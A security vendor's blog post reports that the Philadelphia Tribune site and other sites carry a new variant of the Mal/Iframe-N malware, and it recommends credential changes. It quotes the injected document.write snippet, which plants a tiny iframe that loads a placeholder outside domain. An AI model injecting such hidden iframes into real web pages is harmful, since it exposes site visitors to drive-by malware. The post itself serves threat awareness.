Mal/Iframe-N: The website of the Philadelphia Tribune, a popular newspaper, infected

Filed Under: Malware, SophosLabs, Vulnerability

The Philadelphia Tribune has been infected with the same malware as was reported on the US Treasury site earlier this week. Detection for Mal/Iframe-N was updated yesterday to detect this threat.

Overnight several high profile sites (including a major NHL website) have been seen hosting this new version of Mal/Iframe-N which instead of having a plain Iframe (see blog) is injected via a script tag containing a document.write.

document.write('<iframe onload="if (!this.src){ this.src='http://DOMAIN.TLD'; this.height=N; this.width=N;}"> where N is a small number.

This particular incarnation of Mal/Iframe-N is sneaky in that it doesn't always appear when you visit the site so the site may appear clean.

Typically, this malware is installed via compromised access details. So we would recommend that web admins change all access details while cleaning this threat.


You might like

Leave a Reply

Fill in your details below or click an icon to log in: Logo

You are commenting using your account. Log Out / Change )

Twitter picture

You are commenting using your Twitter account. Log Out / Change )

Facebook photo

You are commenting using your Facebook account. Log Out / Change )

Google+ photo

You are commenting using your Google+ account. Log Out / Change )

Connecting to %s